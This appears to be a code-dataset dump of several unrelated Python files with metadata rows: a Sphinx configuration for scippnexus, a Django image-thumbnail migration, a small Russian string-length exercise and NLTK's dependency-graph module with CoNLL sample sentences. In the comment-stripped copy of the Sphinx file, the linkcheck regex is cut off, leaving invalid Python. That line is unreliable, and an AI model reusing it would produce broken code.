copyright = u'2022 Scipp contributors'
author = u'Scipp contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
release = u''
warning_is_error = True
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '**.ipynb_checkpoints']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_book_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"logo_only": True,
"repository_url": "https://github.com/scipp/scippnexus",
"repository_branch": "main",
"path_to_docs": "docs",
"use_repository_button": True,
"use_issues_button": True,
"use_edit_page_button": True,
"show_toc_level": 2, # Show subheadings in secondary sidebar
}
html_logo = "_static/logo.png"
html_favicon = "_static/favicon.ico"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'scippnexusdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'scipp.tex', u'scipp Documentation', u'Simon Heybrock', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, 'scipp', u'scipp Documentation', [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'scipp', u'scipp Documentation', author, 'scipp',
'One line description of project.', 'Miscellaneous'),
]
# -- Options for Matplotlib in notebooks ----------------------------------
nbsphinx_execute_arguments = [
"--Session.metadata=scipp_docs_build=True",
]
# -- Options for doctest --------------------------------------------------
doctest_global_setup = '''
import numpy as np
import scipp as sc
'''
# Using normalize whitespace because many __str__ functions in scipp produce
# extraneous empty lines and it would look strange to include them in the docs.
doctest_default_flags = doctest.ELLIPSIS | doctest.IGNORE_EXCEPTION_DETAIL | \
doctest.DONT_ACCEPT_TRUE_FOR_1 | \
doctest.NORMALIZE_WHITESPACE
# -- Options for linkcheck ------------------------------------------------
linkcheck_ignore = [
# Specific lines in Github blobs cannot be found by linkcheck.
r'https?://github\.com/.*?/blob/[a-f0-9]+/.+?#',
]
| 31.407583 | 83 | 0.673306 |
import doctest
from datetime import date
import scippnexus
html_show_sourcelink = True
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
'sphinx.ext.napoleon',
'sphinx_autodoc_typehints',
'sphinx_copybutton',
'nbsphinx',
]
autodoc_type_aliases = {
'VariableLike': 'VariableLike',
'MetaDataMap': 'MetaDataMap',
'array_like': 'array_like',
}
rst_epilog = f"""
.. |SCIPP_RELEASE_MONTH| replace:: {date.today().strftime("%B %Y")}
.. |SCIPP_VERSION| replace:: {scippnexus.__version__}
"""
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('https://numpy.org/doc/stable/', None),
'scipp': ('https://scipp.github.io/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/', None),
'xarray': ('https://xarray.pydata.org/en/stable/', None)
}
autosummary_generate = True
napoleon_google_docstring = False
napoleon_numpy_docstring = True
napoleon_use_param = True
napoleon_use_rtype = False
napoleon_preprocess_types = True
napoleon_type_aliases = {
"DataArray": "~scipp.DataArray",
"Dataset": "~scipp.Dataset",
"Variable": "~scipp.Variable",
"ndarray": "~numpy.ndarray",
}
typehints_defaults = 'comma'
typehints_use_rtype = False
templates_path = ['_templates']
source_suffix = '.rst'
html_sourcelink_suffix = ''
master_doc = 'index'
project = u'scippnexus'
copyright = u'2022 Scipp contributors'
author = u'Scipp contributors'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
release = u''
warning_is_error = True
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '**.ipynb_checkpoints']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_book_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"logo_only": True,
"repository_url": "https://github.com/scipp/scippnexus",
"repository_branch": "main",
"path_to_docs": "docs",
"use_repository_button": True,
"use_issues_button": True,
"use_edit_page_button": True,
"show_toc_level": 2, # Show subheadings in secondary sidebar
}
html_logo = "_static/logo.png"
html_favicon = "_static/favicon.ico"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'scippnexusdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'scipp.tex', u'scipp Documentation', u'Simon Heybrock', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, 'scipp', u'scipp Documentation', [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'scipp', u'scipp Documentation', author, 'scipp',
'One line description of project.', 'Miscellaneous'),
]
# -- Options for Matplotlib in notebooks ----------------------------------
nbsphinx_execute_arguments = [
"--Session.metadata=scipp_docs_build=True",
]
# -- Options for doctest --------------------------------------------------
doctest_global_setup = '''
import numpy as np
import scipp as sc
'''
# Using normalize whitespace because many __str__ functions in scipp produce
# extraneous empty lines and it would look strange to include them in the docs.
doctest_default_flags = doctest.ELLIPSIS | doctest.IGNORE_EXCEPTION_DETAIL | \
doctest.DONT_ACCEPT_TRUE_FOR_1 | \
doctest.NORMALIZE_WHITESPACE
# -- Options for linkcheck ------------------------------------------------
linkcheck_ignore = [
# Specific lines in Github blobs cannot be found by linkcheck.
r'https?://github\.com/.*?/blob/[a-f0-9]+/.+?
]
| true | true |
f71008d441773617443f83aa63ba8084f8da41c4 | 603 | py | Python | src/images/migrations/0002_image_thumbnail.py | thesus/bokstaever | e0a5e2614dd222ccd56a8945aba4fd28de85dd31 | [
"MIT"
] | null | null | null | src/images/migrations/0002_image_thumbnail.py | thesus/bokstaever | e0a5e2614dd222ccd56a8945aba4fd28de85dd31 | [
"MIT"
] | 7 | 2019-11-18T16:11:01.000Z | 2019-11-18T16:11:04.000Z | src/images/migrations/0002_image_thumbnail.py | thesus/bokstaever | e0a5e2614dd222ccd56a8945aba4fd28de85dd31 | [
"MIT"
] | null | null | null | # Generated by Django 2.2 on 2019-04-18 13:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("images", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="image",
name="thumbnail",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="container",
to="images.ImageFile",
),
),
]
| 23.192308 | 60 | 0.543947 |
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("images", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="image",
name="thumbnail",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="container",
to="images.ImageFile",
),
),
]
| true | true |
f7100a0d535f79b24ae402b1d9ef106e9e8e0f59 | 319 | py | Python | 000989letpy/letpy_064_str_len_20200511.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 000989letpy/letpy_064_str_len_20200511.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | 000989letpy/letpy_064_str_len_20200511.py | SafonovMikhail/python_000577 | 739f764e80f1ca354386f00b8e9db1df8c96531d | [
"Apache-2.0"
] | null | null | null | string = input()
string_length = len(string)
print(string_length)
string = input()
if len(string) < 5:
print("Ошибка! Введите больше пяти символов!")
string = input()
if not string:
print("Ошибка! Введите хоть что-нибудь!")
string = input()
if len(string) == 0:
print("Ошибка! Введите хоть что-нибудь!")
| 19.9375 | 50 | 0.680251 | string = input()
string_length = len(string)
print(string_length)
string = input()
if len(string) < 5:
print("Ошибка! Введите больше пяти символов!")
string = input()
if not string:
print("Ошибка! Введите хоть что-нибудь!")
string = input()
if len(string) == 0:
print("Ошибка! Введите хоть что-нибудь!")
| true | true |
f7100c11398d00d664ae324a7f7382af849d2c99 | 30,853 | py | Python | nltk/parse/dependencygraph.py | Geolem/nltk | 39b84d97bc857fce4fef185c69b94546b8474551 | [
"Apache-2.0"
] | null | null | null | nltk/parse/dependencygraph.py | Geolem/nltk | 39b84d97bc857fce4fef185c69b94546b8474551 | [
"Apache-2.0"
] | null | null | null | nltk/parse/dependencygraph.py | Geolem/nltk | 39b84d97bc857fce4fef185c69b94546b8474551 | [
"Apache-2.0"
] | null | null | null | # Natural Language Toolkit: Dependency Grammars
#
# Copyright (C) 2001-2021 NLTK Project
# Author: Jason Narad <jason.narad@gmail.com>
# Steven Bird <stevenbird1@gmail.com> (modifications)
#
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
#
"""
Tools for reading and writing dependency trees.
The input is assumed to be in Malt-TAB format
(http://stp.lingfil.uu.se/~nivre/research/MaltXML.html).
"""
from collections import defaultdict
from itertools import chain
from pprint import pformat
import subprocess
import warnings
from nltk.tree import Tree
#################################################################
# DependencyGraph Class
#################################################################
class DependencyGraph:
"""
A container for the nodes and labelled edges of a dependency structure.
"""
def __init__(
self,
tree_str=None,
cell_extractor=None,
zero_based=False,
cell_separator=None,
top_relation_label="ROOT",
):
"""Dependency graph.
We place a dummy `TOP` node with the index 0, since the root node is
often assigned 0 as its head. This also means that the indexing of the
nodes corresponds directly to the Malt-TAB format, which starts at 1.
If zero-based is True, then Malt-TAB-like input with node numbers
starting at 0 and the root node assigned -1 (as produced by, e.g.,
zpar).
:param str cell_separator: the cell separator. If not provided, cells
are split by whitespace.
:param str top_relation_label: the label by which the top relation is
identified, for examlple, `ROOT`, `null` or `TOP`.
"""
self.nodes = defaultdict(
lambda: {
"address": None,
"word": None,
"lemma": None,
"ctag": None,
"tag": None,
"feats": None,
"head": None,
"deps": defaultdict(list),
"rel": None,
}
)
self.nodes[0].update({"ctag": "TOP", "tag": "TOP", "address": 0})
self.root = None
if tree_str:
self._parse(
tree_str,
cell_extractor=cell_extractor,
zero_based=zero_based,
cell_separator=cell_separator,
top_relation_label=top_relation_label,
)
def remove_by_address(self, address):
"""
Removes the node with the given address. References
to this node in others will still exist.
"""
del self.nodes[address]
def redirect_arcs(self, originals, redirect):
"""
Redirects arcs to any of the nodes in the originals list
to the redirect node address.
"""
for node in self.nodes.values():
new_deps = []
for dep in node["deps"]:
if dep in originals:
new_deps.append(redirect)
else:
new_deps.append(dep)
node["deps"] = new_deps
def add_arc(self, head_address, mod_address):
"""
Adds an arc from the node specified by head_address to the
node specified by the mod address.
"""
relation = self.nodes[mod_address]["rel"]
self.nodes[head_address]["deps"].setdefault(relation, [])
self.nodes[head_address]["deps"][relation].append(mod_address)
# self.nodes[head_address]['deps'].append(mod_address)
def connect_graph(self):
"""
Fully connects all non-root nodes. All nodes are set to be dependents
of the root node.
"""
for node1 in self.nodes.values():
for node2 in self.nodes.values():
if node1["address"] != node2["address"] and node2["rel"] != "TOP":
relation = node2["rel"]
node1["deps"].setdefault(relation, [])
node1["deps"][relation].append(node2["address"])
# node1['deps'].append(node2['address'])
def get_by_address(self, node_address):
"""Return the node with the given address."""
return self.nodes[node_address]
def contains_address(self, node_address):
"""
Returns true if the graph contains a node with the given node
address, false otherwise.
"""
return node_address in self.nodes
def to_dot(self):
"""Return a dot representation suitable for using with Graphviz.
>>> dg = DependencyGraph(
... 'John N 2\\n'
... 'loves V 0\\n'
... 'Mary N 2'
... )
>>> print(dg.to_dot())
digraph G{
edge [dir=forward]
node [shape=plaintext]
<BLANKLINE>
0 [label="0 (None)"]
0 -> 2 [label="ROOT"]
1 [label="1 (John)"]
2 [label="2 (loves)"]
2 -> 1 [label=""]
2 -> 3 [label=""]
3 [label="3 (Mary)"]
}
"""
# Start the digraph specification
s = "digraph G{\n"
s += "edge [dir=forward]\n"
s += "node [shape=plaintext]\n"
# Draw the remaining nodes
for node in sorted(self.nodes.values(), key=lambda v: v["address"]):
s += '\n%s [label="%s (%s)"]' % (
node["address"],
node["address"],
node["word"],
)
for rel, deps in node["deps"].items():
for dep in deps:
if rel is not None:
s += '\n%s -> %s [label="%s"]' % (node["address"], dep, rel)
else:
s += "\n%s -> %s " % (node["address"], dep)
s += "\n}"
return s
def _repr_svg_(self):
"""Show SVG representation of the transducer (IPython magic).
>>> dg = DependencyGraph(
... 'John N 2\\n'
... 'loves V 0\\n'
... 'Mary N 2'
... )
>>> dg._repr_svg_().split('\\n')[0]
'<?xml version="1.0" encoding="UTF-8" standalone="no"?>'
"""
dot_string = self.to_dot()
try:
process = subprocess.Popen(
["dot", "-Tsvg"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
except OSError as e:
raise Exception("Cannot find the dot binary from Graphviz package") from e
out, err = process.communicate(dot_string)
if err:
raise Exception(
"Cannot create svg representation by running dot from string: {}"
"".format(dot_string)
)
return out
def __str__(self):
return pformat(self.nodes)
def __repr__(self):
return "<DependencyGraph with {0} nodes>".format(len(self.nodes))
@staticmethod
def load(
filename, zero_based=False, cell_separator=None, top_relation_label="ROOT"
):
"""
:param filename: a name of a file in Malt-TAB format
:param zero_based: nodes in the input file are numbered starting from 0
rather than 1 (as produced by, e.g., zpar)
:param str cell_separator: the cell separator. If not provided, cells
are split by whitespace.
:param str top_relation_label: the label by which the top relation is
identified, for examlple, `ROOT`, `null` or `TOP`.
:return: a list of DependencyGraphs
"""
with open(filename) as infile:
return [
DependencyGraph(
tree_str,
zero_based=zero_based,
cell_separator=cell_separator,
top_relation_label=top_relation_label,
)
for tree_str in infile.read().split("\n\n")
]
def left_children(self, node_index):
"""
Returns the number of left children under the node specified
by the given address.
"""
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c < index)
def right_children(self, node_index):
"""
Returns the number of right children under the node specified
by the given address.
"""
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c > index)
def add_node(self, node):
if not self.contains_address(node["address"]):
self.nodes[node["address"]].update(node)
def _parse(
self,
input_,
cell_extractor=None,
zero_based=False,
cell_separator=None,
top_relation_label="ROOT",
):
"""Parse a sentence.
:param extractor: a function that given a tuple of cells returns a
7-tuple, where the values are ``word, lemma, ctag, tag, feats, head,
rel``.
:param str cell_separator: the cell separator. If not provided, cells
are split by whitespace.
:param str top_relation_label: the label by which the top relation is
identified, for examlple, `ROOT`, `null` or `TOP`.
"""
def extract_3_cells(cells, index):
word, tag, head = cells
return index, word, word, tag, tag, "", head, ""
def extract_4_cells(cells, index):
word, tag, head, rel = cells
return index, word, word, tag, tag, "", head, rel
def extract_7_cells(cells, index):
line_index, word, lemma, tag, _, head, rel = cells
try:
index = int(line_index)
except ValueError:
# index can't be parsed as an integer, use default
pass
return index, word, lemma, tag, tag, "", head, rel
def extract_10_cells(cells, index):
line_index, word, lemma, ctag, tag, feats, head, rel, _, _ = cells
try:
index = int(line_index)
except ValueError:
# index can't be parsed as an integer, use default
pass
return index, word, lemma, ctag, tag, feats, head, rel
extractors = {
3: extract_3_cells,
4: extract_4_cells,
7: extract_7_cells,
10: extract_10_cells,
}
if isinstance(input_, str):
input_ = (line for line in input_.split("\n"))
lines = (l.rstrip() for l in input_)
lines = (l for l in lines if l)
cell_number = None
for index, line in enumerate(lines, start=1):
cells = line.split(cell_separator)
if cell_number is None:
cell_number = len(cells)
else:
assert cell_number == len(cells)
if cell_extractor is None:
try:
cell_extractor = extractors[cell_number]
except KeyError as e:
raise ValueError(
"Number of tab-delimited fields ({0}) not supported by "
"CoNLL(10) or Malt-Tab(4) format".format(cell_number)
) from e
try:
index, word, lemma, ctag, tag, feats, head, rel = cell_extractor(
cells, index
)
except (TypeError, ValueError):
# cell_extractor doesn't take 2 arguments or doesn't return 8
# values; assume the cell_extractor is an older external
# extractor and doesn't accept or return an index.
word, lemma, ctag, tag, feats, head, rel = cell_extractor(cells)
if head == "_":
continue
head = int(head)
if zero_based:
head += 1
self.nodes[index].update(
{
"address": index,
"word": word,
"lemma": lemma,
"ctag": ctag,
"tag": tag,
"feats": feats,
"head": head,
"rel": rel,
}
)
# Make sure that the fake root node has labeled dependencies.
if (cell_number == 3) and (head == 0):
rel = top_relation_label
self.nodes[head]["deps"][rel].append(index)
if self.nodes[0]["deps"][top_relation_label]:
root_address = self.nodes[0]["deps"][top_relation_label][0]
self.root = self.nodes[root_address]
self.top_relation_label = top_relation_label
else:
warnings.warn(
"The graph doesn't contain a node " "that depends on the root element."
)
def _word(self, node, filter=True):
w = node["word"]
if filter:
if w != ",":
return w
return w
def _tree(self, i):
""" Turn dependency graphs into NLTK trees.
:param int i: index of a node
:return: either a word (if the indexed node is a leaf) or a ``Tree``.
"""
node = self.get_by_address(i)
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
if deps:
return Tree(word, [self._tree(dep) for dep in deps])
else:
return word
def tree(self):
"""
Starting with the ``root`` node, build a dependency tree using the NLTK
``Tree`` constructor. Dependency labels are omitted.
"""
node = self.root
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
return Tree(word, [self._tree(dep) for dep in deps])
def triples(self, node=None):
"""
Extract dependency triples of the form:
((head word, head tag), rel, (dep word, dep tag))
"""
if not node:
node = self.root
head = (node["word"], node["ctag"])
for i in sorted(chain.from_iterable(node["deps"].values())):
dep = self.get_by_address(i)
yield (head, dep["rel"], (dep["word"], dep["ctag"]))
for triple in self.triples(node=dep):
yield triple
def _hd(self, i):
try:
return self.nodes[i]["head"]
except IndexError:
return None
def _rel(self, i):
try:
return self.nodes[i]["rel"]
except IndexError:
return None
# what's the return type? Boolean or list?
def contains_cycle(self):
"""Check whether there are cycles.
>>> dg = DependencyGraph(treebank_data)
>>> dg.contains_cycle()
False
>>> cyclic_dg = DependencyGraph()
>>> top = {'word': None, 'deps': [1], 'rel': 'TOP', 'address': 0}
>>> child1 = {'word': None, 'deps': [2], 'rel': 'NTOP', 'address': 1}
>>> child2 = {'word': None, 'deps': [4], 'rel': 'NTOP', 'address': 2}
>>> child3 = {'word': None, 'deps': [1], 'rel': 'NTOP', 'address': 3}
>>> child4 = {'word': None, 'deps': [3], 'rel': 'NTOP', 'address': 4}
>>> cyclic_dg.nodes = {
... 0: top,
... 1: child1,
... 2: child2,
... 3: child3,
... 4: child4,
... }
>>> cyclic_dg.root = top
>>> cyclic_dg.contains_cycle()
[3, 1, 2, 4]
"""
distances = {}
for node in self.nodes.values():
for dep in node["deps"]:
key = tuple([node["address"], dep])
distances[key] = 1
for _ in self.nodes:
new_entries = {}
for pair1 in distances:
for pair2 in distances:
if pair1[1] == pair2[0]:
key = tuple([pair1[0], pair2[1]])
new_entries[key] = distances[pair1] + distances[pair2]
for pair in new_entries:
distances[pair] = new_entries[pair]
if pair[0] == pair[1]:
path = self.get_cycle_path(self.get_by_address(pair[0]), pair[0])
return path
return False # return []?
def get_cycle_path(self, curr_node, goal_node_index):
for dep in curr_node["deps"]:
if dep == goal_node_index:
return [curr_node["address"]]
for dep in curr_node["deps"]:
path = self.get_cycle_path(self.get_by_address(dep), goal_node_index)
if len(path) > 0:
path.insert(0, curr_node["address"])
return path
return []
def to_conll(self, style):
"""
The dependency graph in CoNLL format.
:param style: the style to use for the format (3, 4, 10 columns)
:type style: int
:rtype: str
"""
if style == 3:
template = "{word}\t{tag}\t{head}\n"
elif style == 4:
template = "{word}\t{tag}\t{head}\t{rel}\n"
elif style == 10:
template = (
"{i}\t{word}\t{lemma}\t{ctag}\t{tag}\t{feats}\t{head}\t{rel}\t_\t_\n"
)
else:
raise ValueError(
"Number of tab-delimited fields ({0}) not supported by "
"CoNLL(10) or Malt-Tab(4) format".format(style)
)
return "".join(
template.format(i=i, **node)
for i, node in sorted(self.nodes.items())
if node["tag"] != "TOP"
)
def nx_graph(self):
"""Convert the data in a ``nodelist`` into a networkx labeled directed graph."""
import networkx
nx_nodelist = list(range(1, len(self.nodes)))
nx_edgelist = [
(n, self._hd(n), self._rel(n)) for n in nx_nodelist if self._hd(n)
]
self.nx_labels = {}
for n in nx_nodelist:
self.nx_labels[n] = self.nodes[n]["word"]
g = networkx.MultiDiGraph()
g.add_nodes_from(nx_nodelist)
g.add_edges_from(nx_edgelist)
return g
class DependencyGraphError(Exception):
"""Dependency graph exception."""
def demo():
malt_demo()
conll_demo()
conll_file_demo()
cycle_finding_demo()
def malt_demo(nx=False):
"""
A demonstration of the result of reading a dependency
version of the first sentence of the Penn Treebank.
"""
dg = DependencyGraph(
"""Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
)
tree = dg.tree()
tree.pprint()
if nx:
# currently doesn't work
import networkx
from matplotlib import pylab
g = dg.nx_graph()
g.info()
pos = networkx.spring_layout(g, dim=1)
networkx.draw_networkx_nodes(g, pos, node_size=50)
# networkx.draw_networkx_edges(g, pos, edge_color='k', width=8)
networkx.draw_networkx_labels(g, pos, dg.nx_labels)
pylab.xticks([])
pylab.yticks([])
pylab.savefig("tree.png")
pylab.show()
def conll_demo():
"""
A demonstration of how to read a string representation of
a CoNLL format dependency tree.
"""
dg = DependencyGraph(conll_data1)
tree = dg.tree()
tree.pprint()
print(dg)
print(dg.to_conll(4))
def conll_file_demo():
print("Mass conll_read demo...")
graphs = [DependencyGraph(entry) for entry in conll_data2.split("\n\n") if entry]
for graph in graphs:
tree = graph.tree()
print("\n")
tree.pprint()
def cycle_finding_demo():
dg = DependencyGraph(treebank_data)
print(dg.contains_cycle())
cyclic_dg = DependencyGraph()
cyclic_dg.add_node({"word": None, "deps": [1], "rel": "TOP", "address": 0})
cyclic_dg.add_node({"word": None, "deps": [2], "rel": "NTOP", "address": 1})
cyclic_dg.add_node({"word": None, "deps": [4], "rel": "NTOP", "address": 2})
cyclic_dg.add_node({"word": None, "deps": [1], "rel": "NTOP", "address": 3})
cyclic_dg.add_node({"word": None, "deps": [3], "rel": "NTOP", "address": 4})
print(cyclic_dg.contains_cycle())
treebank_data = """Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
conll_data1 = """
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
"""
conll_data2 = """1 Cathy Cathy N N eigen|ev|neut 2 su _ _
2 zag zie V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 hen hen Pron Pron per|3|mv|datofacc 2 obj1 _ _
4 wild wild Adj Adj attr|stell|onverv 5 mod _ _
5 zwaaien zwaai N N soort|mv|neut 2 vc _ _
6 . . Punc Punc punt 5 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
1 Dat dat Pron Pron aanw|neut|attr 2 det _ _
2 werkwoord werkwoord N N soort|ev|neut 6 obj1 _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 ze ze Pron Pron per|3|evofmv|nom 6 su _ _
5 zelf zelf Pron Pron aanw|neut|attr|wzelf 3 predm _ _
6 uitgevonden vind V V trans|verldw|onverv 3 vc _ _
7 . . Punc Punc punt 6 punct _ _
1 Het het Pron Pron onbep|neut|zelfst 2 su _ _
2 hoorde hoor V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 bij bij Prep Prep voor 2 ld _ _
4 de de Art Art bep|zijdofmv|neut 6 det _ _
5 warme warm Adj Adj attr|stell|vervneut 6 mod _ _
6 zomerdag zomerdag N N soort|ev|neut 3 obj1 _ _
7 die die Pron Pron betr|neut|zelfst 6 mod _ _
8 ze ze Pron Pron per|3|evofmv|nom 12 su _ _
9 ginds ginds Adv Adv gew|aanw 12 mod _ _
10 achter achter Adv Adv gew|geenfunc|stell|onverv 12 svp _ _
11 had heb V V hulp|ovt|1of2of3|ev 7 body _ _
12 gelaten laat V V trans|verldw|onverv 11 vc _ _
13 . . Punc Punc punt 12 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 hadden heb V V trans|ovt|1of2of3|mv 0 ROOT _ _
3 languit languit Adv Adv gew|geenfunc|stell|onverv 11 mod _ _
4 naast naast Prep Prep voor 11 mod _ _
5 elkaar elkaar Pron Pron rec|neut 4 obj1 _ _
6 op op Prep Prep voor 11 ld _ _
7 de de Art Art bep|zijdofmv|neut 8 det _ _
8 strandstoelen strandstoel N N soort|mv|neut 6 obj1 _ _
9 kunnen kan V V hulp|inf 2 vc _ _
10 gaan ga V V hulp|inf 9 vc _ _
11 liggen lig V V intrans|inf 10 vc _ _
12 . . Punc Punc punt 11 punct _ _
1 Zij zij Pron Pron per|3|evofmv|nom 2 su _ _
2 zou zal V V hulp|ovt|1of2of3|ev 7 cnj _ _
3 mams mams N N soort|ev|neut 4 det _ _
4 rug rug N N soort|ev|neut 5 obj1 _ _
5 ingewreven wrijf V V trans|verldw|onverv 6 vc _ _
6 hebben heb V V hulp|inf 2 vc _ _
7 en en Conj Conj neven 0 ROOT _ _
8 mam mam V V trans|ovt|1of2of3|ev 7 cnj _ _
9 de de Art Art bep|zijdofmv|neut 10 det _ _
10 hare hare Pron Pron bez|3|ev|neut|attr 8 obj1 _ _
11 . . Punc Punc punt 10 punct _ _
1 Of of Conj Conj onder|metfin 0 ROOT _ _
2 ze ze Pron Pron per|3|evofmv|nom 3 su _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
